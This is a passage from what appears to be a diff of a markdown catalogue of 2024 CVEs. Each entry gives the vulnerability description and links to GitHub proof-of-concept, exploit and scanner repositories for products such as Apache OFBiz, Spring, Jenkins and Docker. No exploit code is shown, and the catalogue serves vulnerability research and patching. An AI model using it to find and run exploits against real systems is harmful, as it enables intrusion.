compromised service, rendering this vulnerability unexploitable. Prior to the domain level intervention, there were no server-side workarounds and the confidentiality, integrity, and availability impacts of this vulnerability were high. Clients could ensure they were not affected by using a modern browser that supported the fetch standard. + + +- [Havoc10-sw/Detect_polyfill_CVE-2024-38537-](https://github.com/Havoc10-sw/Detect_polyfill_CVE-2024-38537-) + +### CVE-2024-38793 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PriceListo Best Restaurant Menu by PriceListo allows SQL Injection.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.4.1. + + +- [ret2desync/CVE-2024-38793-PoC](https://github.com/ret2desync/CVE-2024-38793-PoC) + +### CVE-2024-38816 (2024-09-13) + +Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.\n\nSpecifically, an application is vulnerable when both of the following are true:\n\n * the web application uses RouterFunctions to serve static resources\n * resource handling is explicitly configured with a FileSystemResource location\n\n\nHowever, malicious requests are blocked and rejected when any of the following is true:\n\n * the Spring Security HTTP Firewall https://docs.spring.io/spring-security/reference/servlet/exploits/firewall.html  is in use\n * the application runs on Tomcat or Jetty + + +- [startsw1th/cve-2024-38816-demo](https://github.com/startsw1th/cve-2024-38816-demo) +- [WULINPIN/CVE-2024-38816-PoC](https://github.com/WULINPIN/CVE-2024-38816-PoC) +- [Galaxy-system/cve-2024-38816](https://github.com/Galaxy-system/cve-2024-38816) + +### CVE-2024-38821 (2024-10-28) + +Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances.\n\nFor this to impact an application, all of the following must be true:\n\n * It must be a WebFlux application\n * It must be using Spring's static resources support\n * It must have a non-permitAll authorization rule applied to the static resources support + + +- [mouadk/cve-2024-38821](https://github.com/mouadk/cve-2024-38821) + +### CVE-2024-38856 (2024-08-05) + +Incorrect Authorization vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: through 18.12.14.\n\nUsers are recommended to upgrade to version 18.12.15, which fixes the issue.\n\nUnauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints). + + +- [securelayer7/CVE-2024-38856_Scanner](https://github.com/securelayer7/CVE-2024-38856_Scanner) +- [ThatNotEasy/CVE-2024-38856](https://github.com/ThatNotEasy/CVE-2024-38856) +- [Praison001/CVE-2024-38856-ApacheOfBiz](https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz) +- [0x20c/CVE-2024-38856-EXP](https://github.com/0x20c/CVE-2024-38856-EXP) +- [emanueldosreis/CVE-2024-38856](https://github.com/emanueldosreis/CVE-2024-38856) +- [BBD-YZZ/CVE-2024-38856-RCE](https://github.com/BBD-YZZ/CVE-2024-38856-RCE) +- [XiaomingX/cve-2024-38856-poc](https://github.com/XiaomingX/cve-2024-38856-poc) + +### CVE-2024-39031 (2024-07-09) + +In Silverpeas Core <= 6.3.5, in Mes Agendas, a user can create new events and add them to their calendar. Additionally, users can invite others from the same domain, including administrators, to these events. A standard user can inject an XSS payload into the "Titre" and "Description" fields when creating an event and then add the administrator or any user to the event. When the invited user (victim) views their own profile, the payload will be executed on their side, even if they do not click on the event. + + +- [toneemarqus/CVE-2024-39031](https://github.com/toneemarqus/CVE-2024-39031) + +### CVE-2024-39069 (2024-07-09) + +An issue in ifood Order Manager v3.35.5 'Gestor de Peddios.exe' allows attackers to execute arbitrary code via a DLL hijacking attack. + + +- [AungSoePaing/CVE-2024-39069](https://github.com/AungSoePaing/CVE-2024-39069) + +### CVE-2024-39081 (2024-09-18) + +An issue in SMART TYRE CAR & BIKE v4.2.0 allows attackers to perform a man-in-the-middle attack via Bluetooth communications. + + +- [Amirasaiyad/BLE-TPMS](https://github.com/Amirasaiyad/BLE-TPMS) + +### CVE-2024-39090 (2024-07-18) + +The PHPGurukul Online Shopping Portal Project version 2.0 contains a vulnerability that allows Cross-Site Request Forgery (CSRF) to lead to Stored Cross-Site Scripting (XSS). An attacker can exploit this vulnerability to execute arbitrary JavaScript code in the context of a user's session, potentially leading to account takeover. + + +- [ghostwirez/CVE-2024-39090-PoC](https://github.com/ghostwirez/CVE-2024-39090-PoC) + +### CVE-2024-39203 (2024-07-08) + +A cross-site scripting (XSS) vulnerability in the Backend Theme Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + + +- [5r1an/CVE-2024-39203](https://github.com/5r1an/CVE-2024-39203) + +### CVE-2024-39205 (2024-10-28) + +An issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request. + + +- [Marven11/CVE-2024-39205-Pyload-RCE](https://github.com/Marven11/CVE-2024-39205-Pyload-RCE) + +### CVE-2024-39210 (2024-07-05) + +Best House Rental Management System v1.0 was discovered to contain an arbitrary file read vulnerability via the Page parameter at index.php. This vulnerability allows attackers to read arbitrary PHP files and access other sensitive information within the application. + + +- [KRookieSec/CVE-2024-39210](https://github.com/KRookieSec/CVE-2024-39210) + +### CVE-2024-39211 (2024-07-04) + +Kaiten 57.128.8 allows remote attackers to enumerate user accounts via a crafted POST request, because a login response contains a user_email field only if the user account exists. + + +- [artemy-ccrsky/CVE-2024-39211](https://github.com/artemy-ccrsky/CVE-2024-39211) + +### CVE-2024-39248 (2024-07-03) + +A cross-site scripting (XSS) vulnerability in SimpCMS v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field at /admin.php. + + +- [jasonthename/CVE-2024-39248](https://github.com/jasonthename/CVE-2024-39248) + +### CVE-2024-39250 (2024-07-22) + +EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface. + + +- [efrann/CVE-2024-39250](https://github.com/efrann/CVE-2024-39250) + +### CVE-2024-39304 (2024-07-26) + +ChurchCRM is an open-source church management system. Versions of the application prior to 5.9.2 are vulnerable to an authenticated SQL injection due to an improper sanitization of user input. Authentication is required, but no elevated privileges are necessary. This allows attackers to inject SQL statements directly into the database query due to inadequate sanitization of the EID parameter in in a GET request to `/GetText.php`. Version 5.9.2 patches the issue. + + +- [apena-ba/CVE-2024-39304](https://github.com/apena-ba/CVE-2024-39304) + +### CVE-2024-39306 +- [apena-ba/CVE-2024-39306](https://github.com/apena-ba/CVE-2024-39306) + +### CVE-2024-39614 (2024-07-10) + +An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_variant() was subject to a potential denial-of-service attack when used with very long strings containing specific characters. + + +- [Abdurahmon3236/-CVE-2024-39614](https://github.com/Abdurahmon3236/-CVE-2024-39614) + +### CVE-2024-39689 (2024-07-05) + +Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi starting in 2021.05.30 and prior to 2024.07.4 recognized root certificates from `GLOBALTRUST`. Certifi 2024.07.04 removes root certificates from `GLOBALTRUST` from the root store. These are in the process of being removed from Mozilla's trust store. `GLOBALTRUST`'s root certificates are being removed pursuant to an investigation which identified "long-running and unresolved compliance issues." + + +- [roy-aladin/InfraTest](https://github.com/roy-aladin/InfraTest) + +### CVE-2024-39700 (2024-07-16) + +JupyterLab extension template is a `copier` template for JupyterLab extensions. Repositories created using this template with `test` option include `update-integration-tests.yml` workflow which has an RCE vulnerability. Extension authors hosting their code on GitHub are urged to upgrade the template to the latest version. Users who made changes to `update-integration-tests.yml`, accept overwriting of this file and re-apply your changes later. Users may wish to temporarily disable GitHub Actions while working on the upgrade. We recommend rebasing all open pull requests from untrusted users as actions may run using the version from the `main` branch at the time when the pull request was created. Users who are upgrading from template version prior to 4.3.0 may wish to leave out proposed changes to the release workflow for now as it requires additional configuration. + + +- [LOURC0D3/CVE-2024-39700-PoC](https://github.com/LOURC0D3/CVE-2024-39700-PoC) + +### CVE-2024-39844 (2024-07-03) + +In ZNC before 1.9.1, remote code execution can occur in modtcl via a KICK. + + +- [ph1ns/CVE-2024-39844](https://github.com/ph1ns/CVE-2024-39844) + +### CVE-2024-39929 (2024-07-04) + +Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users. + + +- [rxerium/CVE-2024-39929](https://github.com/rxerium/CVE-2024-39929) +- [michael-david-fry/CVE-2024-39929](https://github.com/michael-david-fry/CVE-2024-39929) + +### CVE-2024-39943 (2024-07-04) + +rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js). + + +- [truonghuuphuc/CVE-2024-39943-Poc](https://github.com/truonghuuphuc/CVE-2024-39943-Poc) + +### CVE-2024-40080 +- [perras/CVE-2024-40080](https://github.com/perras/CVE-2024-40080) + +### CVE-2024-40110 (2024-07-12) + +Sourcecodester Poultry Farm Management System v1.0 contains an Unauthenticated Remote Code Execution (RCE) vulnerability via the productimage parameter at /farm/product.php. + + +- [Abdurahmon3236/CVE-2024-40110](https://github.com/Abdurahmon3236/CVE-2024-40110) + +### CVE-2024-40119 (2024-07-17) + +Nepstech Wifi Router xpon (terminal) model NTPL-Xpon1GFEVN v.1.0 Firmware V2.0.1 contains a Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover. + + +- [sudo-subho/nepstech-xpon-router-CVE-2024-40119](https://github.com/sudo-subho/nepstech-xpon-router-CVE-2024-40119) + +### CVE-2024-40318 (2024-07-25) + +An arbitrary file upload vulnerability in Webkul Qloapps v1.6.0.0 allows attackers to execute arbitrary code via uploading a crafted file. + + +- [3v1lC0d3/RCE-QloApps-CVE-2024-40318](https://github.com/3v1lC0d3/RCE-QloApps-CVE-2024-40318) + +### CVE-2024-40324 (2024-07-25) + +A CRLF injection vulnerability in E-Staff v5.1 allows attackers to insert Carriage Return (CR) and Line Feed (LF) characters into input fields, leading to HTTP response splitting and header manipulation. + + +- [aleksey-vi/CVE-2024-40324](https://github.com/aleksey-vi/CVE-2024-40324) + +### CVE-2024-40348 (2024-07-20) + +An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. + + +- [bigb0x/CVE-2024-40348](https://github.com/bigb0x/CVE-2024-40348) + +### CVE-2024-40422 (2024-07-24) + +The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system. + + +- [alpernae/CVE-2024-40422](https://github.com/alpernae/CVE-2024-40422) +- [j3r1ch0123/CVE-2024-40422](https://github.com/j3r1ch0123/CVE-2024-40422) + +### CVE-2024-40431 (2024-10-23) + +A lack of input validation in Realtek SD card reader driver before 10.0.26100.21374 through the implementation of the IOCTL_SCSI_PASS_THROUGH control of the SD card reader driver allows an attacker to write to predictable kernel memory locations, even as a low-privileged user. + + +- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN) + +### CVE-2024-40443 (2024-11-13) + +SQL Injection vulnerability in Simple Laboratory Management System using PHP and MySQL v.1.0 allows a remote attacker to cause a denial of service via the delete_users function in the Useres.php + + +- [Yuma-Tsushima07/CVE-2024-40443](https://github.com/Yuma-Tsushima07/CVE-2024-40443) + +### CVE-2024-40457 (2024-09-12) + +No-IP Dynamic Update Client (DUC) v3.x uses cleartext credentials that may occur on a command line or in a file. NOTE: the vendor's position is that cleartext in /etc/default/noip-duc is recommended and is the intentional behavior. + + +- [jeppojeps/CVE-2024-40457-PoC](https://github.com/jeppojeps/CVE-2024-40457-PoC) + +### CVE-2024-40492 (2024-07-17) + +Cross Site Scripting vulnerability in Heartbeat Chat v.15.2.1 allows a remote attacker to execute arbitrary code via the setname function. + + +- [minendie/POC_CVE-2024-40492](https://github.com/minendie/POC_CVE-2024-40492) + +### CVE-2024-40498 (2024-08-05) + +SQL Injection vulnerability in PuneethReddyHC Online Shopping sysstem advanced v.1.0 allows an attacker to execute arbitrary code via the register.php + + +- [Dirac231/CVE-2024-40498](https://github.com/Dirac231/CVE-2024-40498) + +### CVE-2024-40500 (2024-08-12) + +Cross Site Scripting vulnerability in Martin Kucej i-librarian v.5.11.0 and before allows a local attacker to execute arbitrary code via the search function in the import component. + + +- [nitipoom-jar/CVE-2024-40500](https://github.com/nitipoom-jar/CVE-2024-40500) + +### CVE-2024-40506 (2024-09-26) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMHospitality.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40506](https://github.com/Jansen-C-Moreira/CVE-2024-40506) + +### CVE-2024-40507 (2024-09-26) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMPersonnel.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40507](https://github.com/Jansen-C-Moreira/CVE-2024-40507) + +### CVE-2024-40508 (2024-09-26) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMConference.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40508](https://github.com/Jansen-C-Moreira/CVE-2024-40508) + +### CVE-2024-40509 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMFinDev.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40509](https://github.com/Jansen-C-Moreira/CVE-2024-40509) + +### CVE-2024-40510 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMCommon.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40510](https://github.com/Jansen-C-Moreira/CVE-2024-40510) + +### CVE-2024-40511 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMServerAdmin.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40511](https://github.com/Jansen-C-Moreira/CVE-2024-40511) + +### CVE-2024-40512 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMReporting.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40512](https://github.com/Jansen-C-Moreira/CVE-2024-40512) + +### CVE-2024-40617 (2024-07-17) + +Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated attacker with User Class privilege sends a specially crafted request to the affected product, access restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked. + + +- [KyssK00L/CVE-2024-40617](https://github.com/KyssK00L/CVE-2024-40617) + +### CVE-2024-40658 (2024-09-11) + +In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658) + +### CVE-2024-40662 (2024-09-11) + +In scheme of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Aakashmom/net_G2.5_CVE-2024-40662](https://github.com/Aakashmom/net_G2.5_CVE-2024-40662) + +### CVE-2024-40673 +- [Aakashmom/G3_libcore_native_CVE-2024-40673](https://github.com/Aakashmom/G3_libcore_native_CVE-2024-40673) + +### CVE-2024-40675 +- [Aakashmom/intent_CVE-2024-40675](https://github.com/Aakashmom/intent_CVE-2024-40675) + +### CVE-2024-40676 +- [Aakashmom/frameworks_base_accounts_CVE-2024-40676](https://github.com/Aakashmom/frameworks_base_accounts_CVE-2024-40676) +- [Aakashmom/accounts_CVE-2024-40676-](https://github.com/Aakashmom/accounts_CVE-2024-40676-) + +### CVE-2024-40711 (2024-09-07) + +A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE). + + +- [watchtowrlabs/CVE-2024-40711](https://github.com/watchtowrlabs/CVE-2024-40711) +- [realstatus/CVE-2024-40711-Exp](https://github.com/realstatus/CVE-2024-40711-Exp) +- [XiaomingX/cve-2024-40711-poc](https://github.com/XiaomingX/cve-2024-40711-poc) + +### CVE-2024-40725 (2024-07-18) + +A partial fix for  CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.\n\nUsers are recommended to upgrade to version 2.4.62, which fixes this issue.\n\n + + +- [TAM-K592/CVE-2024-40725-CVE-2024-40898](https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898) +- [whiterose7777/CVE-2024-40725-CVE-2024-40898](https://github.com/whiterose7777/CVE-2024-40725-CVE-2024-40898) + +### CVE-2024-40892 (2024-08-12) + +A weak credential vulnerability exists in Firewalla Box Software versions before 1.979. This vulnerability allows a physically close attacker to use the license UUID for authentication and provision SSH credentials over the Bluetooth Low-Energy (BTLE) interface. Once an attacker gains access to the LAN, they could log into the SSH interface using the provisioned credentials. The license UUID can be acquired through plain-text Bluetooth sniffing, reading the QR code on the bottom of the device, or brute-forcing the UUID (though this is less likely). + + +- [xen0bit/fwbt](https://github.com/xen0bit/fwbt) + +### CVE-2024-41107 (2024-07-19) + +The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account.\n\nAffected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.\n\n + + +- [d0rb/CVE-2024-41107](https://github.com/d0rb/CVE-2024-41107) + +### CVE-2024-41110 (2024-07-24) + +Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.\n\nUsing a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.\n\nA security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.\n\nDocker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.\n\ndocker-ce v27.1.1 containes patches to fix the vulnerability. Patches have also been merged into the master, 19.03, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege. + + +- [vvpoglazov/cve-2024-41110-checker](https://github.com/vvpoglazov/cve-2024-41110-checker) +- [PauloParoPP/CVE-2024-41110-SCAN](https://github.com/PauloParoPP/CVE-2024-41110-SCAN) + +### CVE-2024-41276 (2024-10-01) + +A vulnerability in Kaiten version 57.131.12 and earlier allows attackers to bypass the PIN code authentication mechanism. The application requires users to input a 6-digit PIN code sent to their email for authorization after entering their login credentials. However, the request limiting mechanism can be easily bypassed, enabling attackers to perform a brute force attack to guess the correct PIN and gain unauthorized access to the application. + + +- [artemy-ccrsky/CVE-2024-41276](https://github.com/artemy-ccrsky/CVE-2024-41276) + +### CVE-2024-41290 (2024-10-02) + +FlatPress CMS v1.3.1 1.3 was discovered to use insecure methods to store authentication data via the cookie's component. + + +- [paragbagul111/CVE-2024-41290](https://github.com/paragbagul111/CVE-2024-41290) + +### CVE-2024-41301 +- [patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting](https://github.com/patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting) + +### CVE-2024-41302 +- [patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection](https://github.com/patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection) + +### CVE-2024-41312 +- [Amal264882/CVE-2024-41312.](https://github.com/Amal264882/CVE-2024-41312.) + +### CVE-2024-41570 (2024-08-09) + +An Unauthenticated Server-Side Request Forgery (SSRF) in demon callback handling in Havoc 2 0.7 allows attackers to send arbitrary network traffic originating from the team server. + + +- [chebuya/Havoc-C2-SSRF-poc](https://github.com/chebuya/Havoc-C2-SSRF-poc) + +### CVE-2024-41628 (2024-07-26) + +Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API. + + +- [Redshift-CyberSecurity/CVE-2024-41628](https://github.com/Redshift-CyberSecurity/CVE-2024-41628) + +### CVE-2024-41640 (2024-07-29) + +Cross Site Scripting (XSS) vulnerability in AML Surety Eco up to 3.5 allows an attacker to run arbitrary code via crafted GET request using the id parameter. + + +- [alemusix/CVE-2024-41640](https://github.com/alemusix/CVE-2024-41640) + +### CVE-2024-41651 (2024-08-12) + +An issue in Prestashop v.8.1.7 and before allows a remote attacker to execute arbitrary code via the module upgrade functionality. NOTE: this is disputed by multiple parties, who report that exploitation requires that an attacker be able to hijack network requests made by an admin user (who, by design, is allowed to change the code that is running on the server). + + +- [Fckroun/CVE-2024-41651](https://github.com/Fckroun/CVE-2024-41651) + +### CVE-2024-41662 (2024-07-24) + +VNote is a note-taking platform. A Cross-Site Scripting (XSS) vulnerability has been identified in the Markdown rendering functionality of versions 3.18.1 and prior of the VNote note-taking application. This vulnerability allows the injection and execution of arbitrary JavaScript code through which remote code execution can be achieved. A patch for this issue is available at commit f1af78573a0ef51d6ef6a0bc4080cddc8f30a545. Other mitigation strategies include implementing rigorous input sanitization for all Markdown content and utilizing a secure Markdown parser that appropriately escapes or strips potentially dangerous content. + + +- [sh3bu/CVE-2024-41662](https://github.com/sh3bu/CVE-2024-41662) + +### CVE-2024-41958 (2024-08-05) + +mailcow: dockerized is an open source groupware/email suite based on docker. A vulnerability has been discovered in the two-factor authentication (2FA) mechanism. This flaw allows an authenticated attacker to bypass the 2FA protection, enabling unauthorized access to other accounts that are otherwise secured with 2FA. To exploit this vulnerability, the attacker must first have access to an account within the system and possess the credentials of the target account that has 2FA enabled. By leveraging these credentials, the attacker can circumvent the 2FA process and gain access to the protected account. This issue has been addressed in the `2024-07` release. All users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [OrangeJuiceHU/CVE-2024-41958-PoC](https://github.com/OrangeJuiceHU/CVE-2024-41958-PoC) + +### CVE-2024-41992 (2024-11-11) + +Wi-Fi Alliance wfa_dut (in Wi-Fi Test Suite) through 9.0.0 allows OS command injection via 802.11x frames because the system() library function is used. For example, on Arcadyan FMIMG51AX000J devices, this leads to wfaTGSendPing remote code execution as root via traffic to TCP port 8000 or 8080 on a LAN interface. On other devices, this may be exploitable over a WAN interface. + + +- [fj016/CVE-2024-41992-PoC](https://github.com/fj016/CVE-2024-41992-PoC) + +### CVE-2024-42346 (2024-09-20) + +Galaxy is a free, open-source system for analyzing data, authoring workflows, training and education, publishing tools, managing infrastructure, and more. The editor visualization, /visualizations endpoint, can be used to store HTML tags and trigger javascript execution upon edit operation. All supported branches of Galaxy (and more back to release_20.05) were amended with the supplied patches. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [partywavesec/CVE-2024-42346](https://github.com/partywavesec/CVE-2024-42346) + +### CVE-2024-42461 (2024-08-02) + +In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed. + + +- [fevar54/CVE-2024-42461](https://github.com/fevar54/CVE-2024-42461) + +### CVE-2024-42640 (2024-10-11) + +angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + +- [rvizx/CVE-2024-42640](https://github.com/rvizx/CVE-2024-42640) +- [KTN1990/CVE-2024-42640](https://github.com/KTN1990/CVE-2024-42640) + +### CVE-2024-42642 (2024-09-04) + +Micron Crucial MX500 Series Solid State Drives M3CR046 is vulnerable to Buffer Overflow, which can be triggered by sending specially crafted ATA packets from the host to the drive controller. + + +- [VL4DR/CVE-2024-42642](https://github.com/VL4DR/CVE-2024-42642) + +### CVE-2024-42657 (2024-08-19) + +An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the lack of encryption during login process + + +- [sudo-subho/CVE-2024-42657](https://github.com/sudo-subho/CVE-2024-42657) + +### CVE-2024-42658 (2024-08-19) + +An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the cookie's parameter + + +- [sudo-subho/CVE-2024-42658](https://github.com/sudo-subho/CVE-2024-42658) + +### CVE-2024-42758 (2024-08-16) + +A Cross-site Scripting (XSS) vulnerability exists in version v2024-01-05 of the indexmenu plugin when is used and enabled in Dokuwiki (Open Source Wiki Engine). A malicious attacker can input XSS payloads for example when creating or editing existing page, to trigger the XSS on Dokuwiki, which is then stored in .txt file (due to nature of how Dokuwiki is designed), which presents stored XSS. + + +- [1s1ldur/CVE-2024-42758](https://github.com/1s1ldur/CVE-2024-42758) + +### CVE-2024-42834 (2024-11-13) + +A stored cross-site scripting (XSS) vulnerability in the Create Customer API in Incognito Service Activation Center (SAC) UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter. + + +- [CyberSec-Supra/CVE-2024-42834](https://github.com/CyberSec-Supra/CVE-2024-42834) + +### CVE-2024-42845 (2024-08-23) + +An eval Injection vulnerability in the component invesalius/reader/dicom.py of InVesalius 3.1.99991 through 3.1.99998 allows attackers to execute arbitrary code via loading a crafted DICOM file. + + +- [partywavesec/invesalius3_vulnerabilities](https://github.com/partywavesec/invesalius3_vulnerabilities) + +### CVE-2024-42849 (2024-08-16) + +An issue in Silverpeas v.6.4.2 and lower allows a remote attacker to cause a denial of service via the password change function. + + +- [njmbb8/CVE-2024-42849](https://github.com/njmbb8/CVE-2024-42849) + +### CVE-2024-42850 (2024-08-16) + +An issue in the password change function of Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements. + + +- [njmbb8/CVE-2024-42850](https://github.com/njmbb8/CVE-2024-42850) + +### CVE-2024-42861 (2024-09-23) + +An issue in IEEE 802.1AS linuxptp v.4.2 and before allowing a remote attacker to cause a denial of service via a crafted Pdelay_Req message to the time synchronization function + + +- [qiupy123/CVE-2024-42861](https://github.com/qiupy123/CVE-2024-42861) + +### CVE-2024-42919 (2024-08-20) + +eScan Management Console 14.0.1400.2281 is vulnerable to Incorrect Access Control via acteScanAVReport. + + +- [jeyabalaji711/CVE-2024-42919](https://github.com/jeyabalaji711/CVE-2024-42919) + +### CVE-2024-42992 +- [thanhh23/CVE-2024-42992](https://github.com/thanhh23/CVE-2024-42992) + +### CVE-2024-43035 +- [ZeroPathAI/Fonoster-LFI-PoC](https://github.com/ZeroPathAI/Fonoster-LFI-PoC) + +### CVE-2024-43044 (2024-08-07) + +Jenkins 2.470 and earlier, LTS 2.452.3 and earlier allows agent processes to read arbitrary files from the Jenkins controller file system by using the `ClassLoaderProxy#fetchJar` method in the Remoting library. + + +- [HwMex0/CVE-2024-43044](https://github.com/HwMex0/CVE-2024-43044) +- [jenkinsci-cert/SECURITY-3430](https://github.com/jenkinsci-cert/SECURITY-3430) +- [v9d0g/CVE-2024-43044-POC](https://github.com/v9d0g/CVE-2024-43044-POC) +- [convisolabs/CVE-2024-43044-jenkins](https://github.com/convisolabs/CVE-2024-43044-jenkins) + +### CVE-2024-43160 (2024-08-13) + +Unrestricted Upload of File with Dangerous Type vulnerability in BerqWP allows Code Injection.This issue affects BerqWP: from n/a through 1.7.6. + + +- [KTN1990/CVE-2024-43160](https://github.com/KTN1990/CVE-2024-43160) + +### CVE-2024-43363 (2024-10-07) + +Cacti is an open source performance and fault management framework. An admin user can create a device with a malicious hostname containing php code and repeat the installation process (completing only step 5 of the installation process is enough, no need to complete the steps before or after it) to use a php file as the cacti log file. After having the malicious hostname end up in the logs (log poisoning), one can simply go to the log file url to execute commands to achieve RCE. This issue has been addressed in version 1.2.28 and all users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [p33d/CVE-2024-43363](https://github.com/p33d/CVE-2024-43363) + +### CVE-2024-43416 (2024-11-18) + +GLPI is a free asset and IT management software package. Starting in version 0.80 and prior to version 10.0.17, an unauthenticated user can use an application endpoint to check if an email address corresponds to a valid GLPI user. Version 10.0.17 fixes the issue. + + +- [0xmupa/CVE-2024-43416-PoC](https://github.com/0xmupa/CVE-2024-43416-PoC) + +### CVE-2024-43425 (2024-11-07) + +A flaw was found in Moodle. Additional restrictions are required to avoid a remote code execution risk in calculated question types. Note: 